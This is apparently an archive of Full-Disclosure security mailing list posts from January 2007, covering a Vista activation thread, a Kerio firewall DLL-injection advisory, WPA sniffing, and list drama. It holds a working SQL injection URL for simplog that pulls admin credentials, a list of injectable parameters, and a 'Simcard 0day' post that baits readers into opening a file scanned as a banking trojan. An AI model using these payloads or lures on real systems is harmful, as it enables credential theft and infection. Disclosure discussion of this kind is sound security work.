From andurmatrix at gmail.com Mon Jan 1 08:47:22 2007
From: andurmatrix at gmail.com (andur matrix)
Date: Mon, 1 Jan 2007 00:47:22 -0800
Subject: [Full-disclosure] [OOT] Thesis for master degree
In-Reply-To: <200612181553.kBIFr3hZ031168@turing-police.cc.vt.edu>
References: <1FA45C2E5F2E4B46967415DA3A804FE88125D9@mail.greenborder.com> <002e01c7213b$6cdabc90$0200a8c0@AMD2500> <200612181553.kBIFr3hZ031168@turing-police.cc.vt.edu>
Message-ID:

Hi,

First make sure which topic you are interested in: attacking or defending. They are of quite different philosophies. If you are into attacking by nature, you cannot do very well in defending. You will find it boring.

andur.

On 12/18/06, Valdis.Kletnieks at vt.edu wrote:
> On Sat, 16 Dec 2006 17:55:50 GMT, Aaron Gray said:
> > > - Disassembling Vista Security
> >
> > This is illegal. So not a very good idea for the thesis.
>
> This of course is *very* dependent on what country you are in.
>
> In the US, the most important law involved would probably be the DMCA,
> which *does* have an exception for reverse engineering for compatibility
> research (17 USC 1201(f)), encryption research (17 USC 1201(g)), and
> security testing (17 USC 1201(j)).
>
> http://www.law.cornell.edu/uscode/html/uscode17/usc_sec_17_00001201----000-.html
>
> Note that 17 USC 1201(j)(2) *specifically* hints that you *really* want
> an in-writing "Get Out Of Jail Free" card for 18 USC 1030 and related.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

From denzity at gmail.com Mon Jan 1 11:26:15 2007
From: denzity at gmail.com (Denzity)
Date: Mon, 1 Jan 2007 11:26:15 +0000
Subject: [Full-disclosure] Gmail XSS?
Message-ID: <2a6cc4320701010326i3897aa18nac9a6255c27d4095@mail.gmail.com>

There are reports of a Gmail XSS in the wild that will steal someone's contact list and email if the website is visited while being logged in to Gmail.

http://cyber-knowledge.net/blog/2007/01/01/gmail-vulnerable-to-contact-list-hijacking/

I can't find this on Bugtraq or any release. Anyone have any more info or a PoC?

Thanks,
Denzity.

From research at matousec.com Mon Jan 1 13:05:49 2007
From: research at matousec.com (Matousec - Transparent security Research)
Date: Mon, 01 Jan 2007 14:05:49 +0100
Subject: [Full-disclosure] Kerio Fake 'iphlpapi' DLL injection Vulnerability
Message-ID: <4599072D.1020209@matousec.com>

Hello,

We would like to inform you about a vulnerability in Sunbelt Kerio Personal Firewall:

Description:
When Sunbelt Kerio Personal Firewall (SKPF) loads dependent modules, it relies on the operating system. The system library iphlpapi.dll is located in the system directory, but the main SKPF service, which requires and loads this DLL, is located in the installation directory of SKPF. This is why it tries to find iphlpapi.dll in its installation directory first and then, if it is not found in this directory, it tries to find it in the system directory. Moreover, it is possible to create new files in the installation directory of SKPF. A malicious application can create a fake iphlpapi.dll in the installation directory of SKPF, which will be loaded by the operating system into the SKPF service during its initialization. This is how the malicious application is able to execute arbitrary code inside the SKPF service and bypass any of its security mechanisms.
Vulnerable software:
* Sunbelt Kerio Personal Firewall 4.3.268
* Sunbelt Kerio Personal Firewall 4.3.246
* probably all versions of Sunbelt Kerio Personal Firewall 4
* possibly older versions of Sunbelt Kerio Personal Firewall

More details and a proof of concept including its source code are available here:
http://www.matousec.com/info/advisories/Kerio-Fake-iphlpapi-DLL-injection.php

Regards,

--
Matousec - Transparent security Research
http://www.matousec.com/

From geoincidents at nls.net Mon Jan 1 19:26:52 2007
From: geoincidents at nls.net (Geo.)
Date: Mon, 1 Jan 2007 14:26:52 -0500
Subject: [Full-disclosure] Vista Reduced Function mode triggered
Message-ID: <0EF6A58451764E158D6B1B54A834423D@control3>

The other day I used my router to limit my Vista laptop from talking to anything but one subnet on the internet. 3 days later suddenly some things would not work. Solitaire failed to start: click on it and you get the magic donut showing it's starting up, then nothing. Right click on network and pick properties and you get the magic donut showing it's starting up, then nothing.

So I removed the routes so Vista could once again phone home and within a minute or two both solitaire and network properties worked just fine.

Now this Vista system is less than 30 days old and has already been activated. So the claims that Reduced Function mode only kicks in if you don't activate within 30 days are bunk if this is Reduced Function mode.

So I decided to trigger RF mode on purpose to see how it responds. I stopped the Software License service, which claims that doing so will trigger RF mode. 24 hours later solitaire, network properties, and control panel all show the same behavior: the magic donut showing they are starting up, then nothing. No events in the event log, nothing. I then started the Software License service and presto, like magic, these functions work again.

So I'm convinced that the machine being routed so it can't talk to MS triggered RF mode within a few days.
Now to me this seems pretty clear even though it wasn't a real scientific method of testing. And further, this looks to me like an accident waiting to happen. I mean, imagine if MS fell off the planet: we would have a pretty major problem as the bulk of the world's computers started shutting down. Talk about a security issue?

So anyone here with a bit more technical expertise want to pick up this ball and run with it?

Geo.

From coderman at gmail.com Mon Jan 1 22:29:38 2007
From: coderman at gmail.com (coderman)
Date: Mon, 1 Jan 2007 14:29:38 -0800
Subject: [Full-disclosure] Authenticated users can sniff WPA traffic?
In-Reply-To: <20061231234244.063F58B87F@www1.email.si>
References: <20061231234244.063F58B87F@www1.email.si>
Message-ID: <4ef5fec60701011429w29671209vd9bbc3b8b57dfa5a@mail.gmail.com>

On 12/31/06, /dev/null wrote:
> ...
> recently I came across this link:
> http://seclists.org/pen-test/2005/Nov/0073.html
>
> Basically, it states that authenticated users, in combination with ARP
> poisoning, can sniff WPA traffic. Can anybody confirm this is possible? If
> that's true, is there any way to prevent this?

of course it's true. don't let ARP poisoning occur on your network. most good wifi security tools / systems will check for this among the other usual masquerading (rogue APs, injection with invalid timestamps, etc).

note that a mandatory part of this attack is having auth credentials for WPA-PSK or WPA-Enterprise (EAP/TLS, etc) so you can talk on the network to mount this ARP poisoning attack.

> I would really appreciate any info/link/paper regarding the topic.

any good IP routing text would be useful, particularly the interplay between ethernet (and other L2 protocols) and IP via ARP/RARP.
as one last side note, if you've got the WPA-PSK secret via dictionary attack you can combine this with disassociate injection to force all clients to re-authenticate while you are listening, so you can recover the client keys (TKIP or CCMP) used for communication and get better results, since you no longer need the ARP hack, which will be slower and more brittle (you must remain in the loop) comparatively.

From drfrancky at securax.org Mon Jan 1 22:31:49 2007
From: drfrancky at securax.org (Javor Ninov)
Date: Tue, 02 Jan 2007 00:31:49 +0200
Subject: [Full-disclosure] simplog 0.9.3.2 SQL injection
Message-ID: <45998BD5.2040303@securax.org>

Affected Software:
simplog up to 0.9.3.2 (latest version - 12/05/2006)

Site:
http://www.simplog.org
Simplog provides an easy way for users to add blogging capabilities to their existing websites. Simplog is written in PHP and compatible with multiple databases. Simplog also features an RSS/Atom aggregator/reader. Powerful, yet simple.

Vulnerability:
SQL Injection in archive.php
other files probably also affected

Example:
http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1

Vendor status:
NOT NOTIFIED

Javor Ninov aka DrFrancky
drfrancky shift+2 securax.org
http://securitydot.net/
From php0t at zorro.hu Mon Jan 1 22:29:10 2007
From: php0t at zorro.hu (php0t)
Date: Mon, 1 Jan 2007 23:29:10 +0100
Subject: [Full-disclosure] Vista Reduced Function mode triggered
In-Reply-To: <0EF6A58451764E158D6B1B54A834423D@control3>
Message-ID: <001401c72df4$4225c470$650ba8c0@DORKA>

Didn't have the chance / interest to meet Vista myself as of yet, but if what you wrote isn't user error or something specific and limited to only a few computers, then excuse me a moment while I lmao.

BTW, is there anything in Vista's agreement in legalish that could be translated into 'you agree that you feed your software internet'? Maybe micro$ says that this is needed to verify that you're running a legal OS every now and then, so $uck it? :-)

Sorry for not having ideas, just raising more questions; hope somebody replies in a few pointing out the obvious.

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Geo.
Sent: Monday, January 01, 2007 8:27 PM
To: full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] Vista Reduced Function mode triggered

The other day I used my router to limit my Vista laptop from talking to anything but one subnet on the internet. 3 days later suddenly some things would not work. Solitaire failed to start: click on it and you get the magic donut showing it's starting up, then nothing. Right click on network and pick properties and you get the magic donut showing it's starting up, then nothing.

So I removed the routes so Vista could once again phone home and within a minute or two both solitaire and network properties worked just fine.

Now this Vista system is less than 30 days old and has already been activated.
So the claims that Reduced Function mode only kicks in if you don't activate within 30 days are bunk if this is Reduced Function mode.

So I decided to trigger RF mode on purpose to see how it responds. I stopped the Software License service, which claims that doing so will trigger RF mode. 24 hours later solitaire, network properties, and control panel all show the same behavior: the magic donut showing they are starting up, then nothing. No events in the event log, nothing. I then started the Software License service and presto, like magic, these functions work again.

So I'm convinced that the machine being routed so it can't talk to MS triggered RF mode within a few days.

Now to me this seems pretty clear even though it wasn't a real scientific method of testing. And further, this looks to me like an accident waiting to happen. I mean, imagine if MS fell off the planet: we would have a pretty major problem as the bulk of the world's computers started shutting down. Talk about a security issue?

So anyone here with a bit more technical expertise want to pick up this ball and run with it?

Geo.

From simon at snosoft.com Mon Jan 1 23:16:59 2007
From: simon at snosoft.com (Simon Smith)
Date: Mon, 01 Jan 2007 18:16:59 -0500
Subject: [Full-disclosure] Jeff Bernstein
In-Reply-To: <4591AC90.3020201@digitalmunition.com>
Message-ID:

It has come to my attention that Jeff Bernstein has been falsely using the names of SNOsoft Research Team members. Moreover, Jeff Bernstein has been falsely associating himself with the SNOsoft/HP/DMCA vulnerability research and development ordeal that happened earlier in 2001.

Jeff Bernstein has never been affiliated with the SNOsoft Research Team nor will he ever be.
Jeff Bernstein does not work with, nor has he ever directly worked with, any of the SNOsoft Team Members.

If anyone has talked with, or speaks with Jeff Bernstein in the future and if Mr. Bernstein mentions SNOsoft, please contact me immediately at simon at snosoft.com.

Thank you.

Regards,
Simon Smith
SNOsoft Research Team
http://www.snosoft.com

From juha-matti.laurio at netti.fi Mon Jan 1 23:20:19 2007
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Tue, 2 Jan 2007 01:20:19 +0200 (EET)
Subject: [Full-disclosure] Gmail XSS?
Message-ID: <24544829.1096251167693620156.JavaMail.juha-matti.laurio@netti.fi>

According to this news it was fixed already:
http://blogs.zdnet.com/Google/?p=434

See the quote from the Google Security Team.

- Juha-Matti

Denzity wrote:
> There are reports of a Gmail XSS in the wild that will steal someone's contact
> list and email if the website is visited while being logged in to Gmail.
>
> http://cyber-knowledge.net/blog/2007/01/01/gmail-vulnerable-to-contact-list-hijacking/
>
> I can't find this on Bugtraq or any release. Anyone have any more info or
> a PoC?
>
> Thanks, Denzity.

From geoincidents at nls.net Mon Jan 1 23:35:25 2007
From: geoincidents at nls.net (Geo.)
Date: Mon, 1 Jan 2007 18:35:25 -0500
Subject: [Full-disclosure] Vista Reduced Function mode triggered
In-Reply-To: <001401c72df4$4225c470$650ba8c0@DORKA>
References: <001401c72df4$4225c470$650ba8c0@DORKA>
Message-ID: <8A738FD57A404DE9941CD67CE94C4067@control3>

> anything in vista's agreement in legalish that could be translated into
> 'you agree that you feed your software internet' ?

http://www.microsoft.com/windowsvista/getready/systemrequirements.mspx

Yep, specifies "internet" under requirements. Should specify unrestricted internet access if you ask me.

Geo.
From poof at fansubber.com Tue Jan 2 00:02:41 2007
From: poof at fansubber.com (Poof)
Date: Mon, 1 Jan 2007 16:02:41 -0800
Subject: [Full-disclosure] Vista Reduced Function mode triggered
In-Reply-To: <8A738FD57A404DE9941CD67CE94C4067@control3>
Message-ID:

The issues that the original poster is having don't sound anything like normal behavior. One of the scenarios expected in Vista would be a laptop that's been activated being used in a restricted internet work zone. And if that laptop has been activated normally (the one-time activation as provided with the Windows install), it shouldn't go to reduced mode. Further, it'll give a 30 day warning prior to going to reduced mode if it's suddenly deactivated, asking for it to be reactivated. (Say a hardware change/etc.)

In short, I am unable to repro this. I'm currently running Vista on two systems; the other system is in a sandbox. (However, it was "open" during the activation process.)

Erm, from what I can see from the requirements, Internet is not required, as it's in the same format as Audio.

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Geo.
Sent: Monday, January 01, 2007 3:35 PM
To: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Vista Reduced Function mode triggered

> anything in vista's agreement in legalish that could be translated into
> 'you agree that you feed your software internet' ?

http://www.microsoft.com/windowsvista/getready/systemrequirements.mspx

Yep, specifies "internet" under requirements. Should specify unrestricted internet access if you ask me.

Geo.
From sebastian.wolfgarten at gmx.net Tue Jan 2 00:56:50 2007
From: sebastian.wolfgarten at gmx.net (Sebastian Wolfgarten)
Date: Tue, 2 Jan 2007 01:56:50 +0100
Subject: [Full-disclosure] Security contact at TrendMicro
Message-ID: <200701020156.50130.sebastian.wolfgarten@gmx.net>

Hi,

does anyone know a security contact at TrendMicro? I was unable to find one on their website and tried both security at trendmicro.com as well as info at trendmicro.com but they bounced back. Anyone? Thanks.

Ah yeah, Happy New Year everyone!

Best regards,
Sebastian Wolfgarten

From dfklsddshd at nerdshack.com Tue Jan 2 00:52:47 2007
From: dfklsddshd at nerdshack.com (dfklsddshd)
Date: Mon, 01 Jan 2007 19:52:47 -0500
Subject: [Full-disclosure] Simcard 0day.
Message-ID: <4599ACDF.6060709@nerdshack.com>

Simcard 0day. Works with all cellphones.

1. Open attachment.
2. Type cellphone number.
3. Wait.

Needs net connection.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: Simcard.com
Type: application/octet-stream
Size: 73216 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070101/ea26d883/attachment.obj

From kf_lists at digitalmunition.com Tue Jan 2 01:42:06 2007
From: kf_lists at digitalmunition.com (K F (lists))
Date: Mon, 01 Jan 2007 20:42:06 -0500
Subject: [Full-disclosure] Welcome to Pwndertino...
Message-ID: <4599B86E.7010209@digitalmunition.com>

Just in case you are drunk / hungover / out of town or whatever... this is a friendly reminder that MOAB has begun.

http://projects.info-pull.com/moab/index.html

-KF

From BlueBoar at thievco.com Tue Jan 2 01:43:05 2007
From: BlueBoar at thievco.com (Blue Boar)
Date: Mon, 01 Jan 2007 17:43:05 -0800
Subject: [Full-disclosure] Simcard 0day.
In-Reply-To: <4599ACDF.6060709@nerdshack.com>
References: <4599ACDF.6060709@nerdshack.com>
Message-ID: <4599B8A9.3090600@thievco.com>

dfklsddshd wrote:
> 1. Open attachment.

Does this actually work on people on a security mailing list?

BB

Complete scanning result of "Simcard.com", received in VirusTotal at 01.02.2007, 02:38:58 (CET).

Antivirus           Version         Update       Result
AntiVir             7.3.0.21        01.01.2007   TR/Spy.Banker.73216
Authentium          4.93.8          12.30.2006   no virus found
Avast               4.7.892.0       12.30.2006   no virus found
AVG                 386             01.01.2007   no virus found
BitDefender         7.2             01.01.2007   GenPack:Generic.Banker.OT.924A93D1
CAT-QuickHeal       8.00            01.01.2007   (Suspicious) - DNAScan
ClamAV              devel-20060426  01.01.2007   no virus found
DrWeb               4.33            12.31.2006   WIN.MAIL.WORM.Virus
eSafe               7.0.14.0        01.01.2007   Suspicious Trojan/Worm
eTrust-InoculateIT  23.73.102       12.30.2006   no virus found
eTrust-Vet          30.3.3289       12.29.2006   no virus found
Ewido               4.0             01.01.2007   no virus found
Fortinet            2.82.0.0        01.01.2007   suspicious
F-Prot              3.16f           12.30.2006   no virus found
F-Prot4             4.2.1.29        12.30.2006   no virus found
Ikarus              T3.1.0.27       01.01.2007   Trojan-Spy.Win32.Banker.axc
Kaspersky           4.0.2.24        01.02.2007   no virus found
McAfee              4929            12.29.2006   no virus found
Microsoft           1.1904          12.31.2006   no virus found
NOD32v2             1951            01.01.2007   probably unknown NewHeur_PE virus
Norman              5.80.02         12.31.2007   no virus found
Panda               9.0.0.4         01.01.2007   Suspicious file
Prevx1              V2              01.02.2007   no virus found
Sophos              4.13.0          01.01.2007   no virus found
Sunbelt             2.2.907.0       12.18.2006   VIPRE.Suspicious
TheHacker           6.0.3.141       01.01.2007   no virus found
VBA32               3.11.1          01.01.2007   no virus found
VirusBuster         4.3.19:9        01.01.2007   no virus found

Additional Information
File size: 73216 bytes
MD5: 5f22c38e77383a68f865a2c8d9c84f0c
SHA1: c1a76dc5fa43d102b447057ce16ad44e8dcf456f
packers: YODA
packers: YodaProt
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

VirusTotal is a free service offered by Hispasec Sistemas.
There are no guarantees about the availability and continuity of this service. Although the detection rate afforded by the use of multiple antivirus engines is far superior to that offered by just one product, these results DO NOT guarantee the harmlessness of a file. Currently, there is not any solution that offers a 100% effectiveness rate for detecting viruses and malware.

From jays at panix.com Tue Jan 2 03:11:02 2007
From: jays at panix.com (Jay Sulzberger)
Date: Mon, 1 Jan 2007 22:11:02 -0500 (EST)
Subject: [Full-disclosure] Vista Reduced Function mode triggered
In-Reply-To:
References:
Message-ID:

On Mon, 1 Jan 2007, Poof wrote:
> The issues that the original poster is having don't sound anything like
> normal behavior. One of the scenarios expected in Vista would be a Laptop
> that's been activated being used in a restricted internet work zone. And if
> that laptop has been activated normally (The 1-time activation as provided
> with the Windows install.) it shouldn't go to reduced mode. Further, it'll
> give a 30 day warning prior to going to reduced mode if it's suddenly
> deactivated asking for it to be reactivated. (Say a hardware change/etc.)
>
> In the short, I am unable to repro this. I'm currently running Vista on two
> systems; the other system is in a sandbox. (However, was "open" during the
> activation process.)
>
> Erm, from what I can see from the requirements, Internet is not required as
> it's in the same format as Audio.

The issue is not: How Microsoft treats those whose boxes Microsoft has Trojaned.

The issue is: Microsoft should not be root on my computer. And no EULA can take away root from me and grant root to Microsoft on any computer I own.

oo--JS.

> -----Original Message-----
> From: full-disclosure-bounces at lists.grok.org.uk
> [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Geo.
> Sent: Monday, January 01, 2007 3:35 PM
> To: full-disclosure at lists.grok.org.uk
> Subject: Re: [Full-disclosure] Vista Reduced Function mode triggered
>
>> anything in vista's agreement in legalish that could be translated into
>> 'you agree that you feed your software internet' ?
>
> http://www.microsoft.com/windowsvista/getready/systemrequirements.mspx
>
> Yep, specifies "internet" under requirements. Should specify unrestricted
> internet access if you ask me.
>
> Geo.

From Robert_Moore at brown.edu Tue Jan 2 03:07:16 2007
From: Robert_Moore at brown.edu (Moore, Robert)
Date: Mon, 1 Jan 2007 22:07:16 -0500
Subject: [Full-disclosure] (no subject)
Message-ID: <08429EB7F8E69841B295084BA07401A9B6D1C9@MAIL3.AD.Brown.Edu>

Simon Smith of the SNOsoft Research Team provides the url > but when you go there, you get:

The SNOsoft Research Team has been acquired by Netragard, L.L.C.
http://www.netragard.com

um, did someone forget to tell Mr. Smith ??

;-)

bob moore

-----------------------------------------------------------------------------------------------------------
Date: Mon, 01 Jan 2007 18:16:59 -0500
From: Simon Smith
Subject: [Full-disclosure] Jeff Bernstein

It has come to my attention that Jeff Bernstein has been falsely using the names of SNOsoft Research Team members. Moreover, Jeff Bernstein has been falsely associating himself with the SNOsoft/HP/DMCA vulnerability research and development ordeal that happened earlier in 2001.

Jeff Bernstein has never been affiliated with the SNOsoft Research Team nor will he ever be.
Jeff Bernstein does not work with, nor has he ever directly worked with, any of the SNOsoft Team Members.

If anyone has talked with, or speaks with Jeff Bernstein in the future and if Mr. Bernstein mentions SNOsoft, please contact me immediately at simon at snosoft.com.

Thank you.

Regards,
Simon Smith
SNOsoft Research Team
http://www.snosoft.com

From str0ke at milw0rm.com Tue Jan 2 03:06:05 2007
From: str0ke at milw0rm.com (str0ke)
Date: Mon, 1 Jan 2007 21:06:05 -0600
Subject: [Full-disclosure] simplog 0.9.3.2 SQL injection
In-Reply-To: <45998BD5.2040303@securax.org>
References: <45998BD5.2040303@securax.org>
Message-ID: <814b9d50701011906wbbda3aaw20b21de847813931@mail.gmail.com>

Javor,

It seems rgod found this vulnerability back in April of 2006.

http://www.milw0rm.com/exploits/1663

<>
ii)
http://[target]/[path]/index.php?blogid=[sql]
http://[target]/[path]/archive.php?blogid=[sql]
http://[target]/[path]/archive.php?m=[sql]
http://[target]/[path]/archive.php?y=[sql]

/str0ke

On 1/1/07, Javor Ninov wrote:
> Affected Software:
> simplog up to 0.9.3.2 (latest version - 12/05/2006)
>
> Site:
> http://www.simplog.org
> Simplog provides an easy way for users to add blogging capabilities to
> their existing websites. Simplog is written in PHP and compatible with
> multiple databases. Simplog also features an RSS/Atom aggregator/reader.
> Powerful, yet simple
>
> Vulnerability:
> SQL Injection in archive.php
> other files probably also affected
>
> Example:
> http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1
>
> Vendor status:
> NOT NOTIFIED
>
>
> Javor Ninov aka DrFrancky
> drfrancky shift+2 securax.org
> http://securitydot.net/
From simon at snosoft.com Tue Jan 2 04:08:39 2007
From: simon at snosoft.com (Simon Smith)
Date: Mon, 01 Jan 2007 23:08:39 -0500
Subject: [Full-disclosure] (no subject)
In-Reply-To: <08429EB7F8E69841B295084BA07401A9B6D1C9@MAIL3.AD.Brown.Edu>
Message-ID:

Very observant of you Bob, the SNOsoft site is not active right now. We hope to reactivate it later on in 2007.

Any more questions? :]

On 1/1/07 10:07 PM, "Moore, Robert" wrote:
> Simon Smith of the SNOsoft Research Team provides the url >
>
> but when you go there, you get:
>
> The SNOsoft Research Team has been acquired by Netragard, L.L.C.
>
> http://www.netragard.com
>
> um, did someone forget to tell Mr. Smith ??
>
> ;-)
>
> bob moore
> ------------------------------------------------------------------------------
> -----------------------------
> Date: Mon, 01 Jan 2007 18:16:59 -0500
> From: Simon Smith
> Subject: [Full-disclosure] Jeff Bernstein
>
> It has come to my attention that Jeff Bernstein has been falsely using the
> names of SNOsoft Research Team members. Moreover, Jeff Bernstein has been
> falsely associating himself with the SNOsoft/HP/DMCA vulnerability research
> and development ordeal that happened earlier in 2001.
>
> Jeff Bernstein has never been affiliated with the SNOsoft Research Team nor
> will he ever be. Jeff Bernstein does not work with nor has he ever directly
> worked with any of the SNOsoft Team Members.
>
> If anyone has talked with, or speaks with Jeff Bernstein in the future and
> if Mr. Bernstein mentions SNOsoft, please contact me immediately at
> simon at snosoft.com.
>
> Thank you.
>
> Regards,
> Simon Smith
> SNOsoft Research Team
> http://www.snosoft.com
From geoincidents at nls.net Tue Jan 2 04:12:05 2007
From: geoincidents at nls.net (Geo.)
Date: Mon, 1 Jan 2007 23:12:05 -0500
Subject: [Full-disclosure] Vista Reduced Function mode triggered
In-Reply-To:
References:
Message-ID: <124D5077DBBE441C9C559CFBC6544999@control3>

> In the short, I am unable to repro this. I'm currently running Vista on
> two systems; the other system is in a sandbox. (However, was "open" during the
> activation process.)

One thing you might try is, instead of cutting it off entirely from the internet, use an external device to limit what internet addresses it can talk to, so that it has a valid and working gateway but it can't phone home.

Also, it didn't happen immediately. I implemented the routing and then it was 3 days before I noticed things weren't working (may have been less but I just didn't notice till then), tried rebooting to cure the problems, poked around at other things, nothing helped. Then upon removing the routing and letting it talk to the whole net it was only minutes before everything was working again.

Geo.

From php0t at zorro.hu Tue Jan 2 04:37:23 2007
From: php0t at zorro.hu (php0t)
Date: Tue, 2 Jan 2007 05:37:23 +0100
Subject: [Full-disclosure] Vista Reduced Function mode triggered
In-Reply-To: <124D5077DBBE441C9C559CFBC6544999@control3>
Message-ID: <002401c72e27$b2a860d0$650ba8c0@DORKA>

> One thing you might try is instead of cutting it off entirely from the
> internet, use an external device to limit what internet addresses it can
> talk to so that it has a valid and working gateway but it can't phone home.

I doubt Vista wants to google for porn instead of phoning home.

After reading the other posts, I think the question is still there: if you cut a Vista's internet access after it's been activated, does it go to reduced mode because of not being able to phone home?
Anybody with certain results on this?

From Larry at larryseltzer.com Tue Jan 2 04:40:48 2007
From: Larry at larryseltzer.com (Larry Seltzer)
Date: Mon, 1 Jan 2007 23:40:48 -0500
Subject: [Full-disclosure] Vista Reduced Function mode triggered
In-Reply-To: <002401c72e27$b2a860d0$650ba8c0@DORKA>
Message-ID: <0273B67044957C41BD71D12EBA2E00AE08C5DC@becca.LarrySeltzer.local>

>> if you cut a vista's internet access after it's been activated, does it
>> go to reduced mode because of not being able to phone home?

It just can't be that simple. There has to be more to what happened to the guy. Lots of computers are offline for several days at a time; it's inconceivable that they didn't test that.

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
larryseltzer at ziffdavis.com

From php0t at zorro.hu Tue Jan 2 05:03:52 2007
From: php0t at zorro.hu (php0t)
Date: Tue, 2 Jan 2007 06:03:52 +0100
Subject: [Full-disclosure] Vista Reduced Function mode triggered
In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE08C5DC@becca.LarrySeltzer.local>
Message-ID: <002501c72e2b$65cdb540$650ba8c0@DORKA>

> It just can't be that simple. There has to be more to what happened to
> the guy. Lots of computers are offline for several days at a time, it's
> inconceivable that they didn't test that.

Yeah, probably - but just for the fun of it I'm curious what happened (unless it's some dumb user error).

From geoincidents at nls.net Tue Jan 2 05:09:49 2007
From: geoincidents at nls.net (Geo.)
Date: Tue, 2 Jan 2007 00:09:49 -0500
Subject: [Full-disclosure] Vista Reduced Function mode triggered
In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE08C5DC@becca.LarrySeltzer.local>
References: <0273B67044957C41BD71D12EBA2E00AE08C5DC@becca.LarrySeltzer.local>
Message-ID:

> It just can't be that simple. There has to be more to what happened to
> the guy.
> Lots of computers are offline for several days at a time, it's
> inconceivable that they didn't test that.

Ok, as complete as I can be in the few minutes I have to post this.

During those three days I did a lot of poking around: stopping and starting services, switching from wired to wireless and back, trying to view high def video (which I still am not able to do in any video player except WMP for some reason), installing codecs and software, running into the event ID 4226 tcp security connect limit, etc.

However I never got any notification of deactivation or any problem of that sort. Then on the third day suddenly solitaire would not start up and I couldn't get into network properties. I did a bunch of rebooting and troubleshooting trying to figure that out but got nowhere.

So I went back to trying to get high def video to work in Media Player Classic and figured perhaps it was trying to download a codec, so I removed the routes. It didn't help the video but I quickly found network properties started working. So then I tried solitaire and it worked. This was all directly after removing the routes; there wasn't but a few minutes between letting it talk to the net and these apps starting to work again.

I decided this was probably reduced functionality in action, but since I had never seen it before I needed some way to trigger it so I could compare, since it would take 3 days to reproduce with route blocking. I disabled the software licensing service, since it claims disabling that service will kick off reduced functionality mode. Nothing happened immediately, but 24 hours later solitaire and network properties (and now control panel) would not start up. It was exactly the same apps and behavior. I enabled and started the software licensing service and in seconds things returned to fully functional, just like removing the routes did.

So it's possible the routes didn't trigger it, but removing them sure cured it quickly, so that is my guess at this point.
Further testing is needed. I won't be testing it for a couple days as I need the laptop connected to other networks to try some other software I need to test. (That tcp limit may prove a problem for network monitoring.)

Geo.

From randy at procyonlabs.com Tue Jan 2 06:12:05 2007
From: randy at procyonlabs.com (Randal T. Rioux)
Date: Tue, 02 Jan 2007 01:12:05 -0500
Subject: [Full-disclosure] Simcard 0day.
In-Reply-To: <4599B8A9.3090600@thievco.com>
References: <4599ACDF.6060709@nerdshack.com> <4599B8A9.3090600@thievco.com>
Message-ID: <4599F7B5.4000202@procyonlabs.com>

Blue Boar wrote:
> dfklsddshd wrote:
>> 1. Open attachment.
>
> Does this actually work on people on a security mailing list?
>
> BB
>
> Complete scanning result of "Simcard.com", received in VirusTotal at 01.02.2007, 02:38:58 (CET).

You would be quite surprised, I'm sure.

randy

From jammer128 at gmail.com Tue Jan 2 07:44:42 2007
From: jammer128 at gmail.com (Jason Miller)
Date: Tue, 2 Jan 2007 01:44:42 -0600
Subject: [Full-disclosure] Vista Reduced Function mode triggered
In-Reply-To:
References: <0273B67044957C41BD71D12EBA2E00AE08C5DC@becca.LarrySeltzer.local>
Message-ID: <829b2de40701012344r1a41e46dx3adcb507049ab79b@mail.gmail.com>

lol, I want to see this happen in a .edu unit where you can only access the internet by going through a limited HTTP proxy that does not allow the connect function; I think it would give humorous results. Unless it 'phones home' by visiting a page and printing said info, in which case it would probably be simple enough to modify the server it goes to and make it think it's going to Microsoft; in that event you could easily get cd keys if that's how it verifies it's a real Vista copy.

On 1/1/07, Geo. wrote:
>> It just can't be that simple. There has to be more to what happened to the guy. Lots of computers are offline for several days at a time, it's inconceivable that they didn't test that.
>
> Ok, as complete as I can be in the few minutes I have to post this.
>
> During those three days I did a lot of poking around, stopping and starting services, switching from wired to wireless and back, trying to view high def video (which I still am not able to do in any video player except WMP for some reason) installing codecs and software, running into the event ID 4226 tcp security connect limit, etc.
>
> However I never got any notification of deactivation or any problem of that sort. Then on the third day suddenly solitaire would not start up and I couldn't get into network properties. I did a bunch of rebooting and troubleshooting trying to figure that out but got nowhere.
>
> So I went back to trying to get high def video to work in Media Player Classic and figured perhaps it was trying to download a codec so I removed the routes. It didn't help the video but I quickly found network properties started working. So then I tried solitaire and it worked. This was all directly after removing the routes, there wasn't but a few minutes between letting it talk to the net and these apps starting to work again.
>
> I decided this was probably reduced functionality in action but since I had never seen it before I needed some way to trigger it so I could compare since it would take 3 days to reproduce with route blocking. I disabled the software licensing service since it claims disabling that service will kick off reduced functionality mode. Nothing happened immediately but 24 hours later solitaire and network properties (and now control panel) would not start up. It was exactly the same apps and behavior. I enabled and started the software licensing service and in seconds things returned to fully functional just like removing the routes did.
>
> So it's possible the routes didn't trigger it, but removing them sure cured it quickly so that is my guess at this point. Further testing is needed.
> I won't be testing it for a couple days as I need the laptop connected to other networks to try some other software I need to test. (that tcp limit may prove a problem for network monitoring)
>
> Geo.

From jammer128 at gmail.com Tue Jan 2 07:38:11 2007
From: jammer128 at gmail.com (Jason Miller)
Date: Tue, 2 Jan 2007 01:38:11 -0600
Subject: [Full-disclosure] Fwd: Botnets: a retrospective to 2006, and where we are headed in 2007
In-Reply-To: <829b2de40701012337m3f7c440eic15c7a2ae3087056@mail.gmail.com>
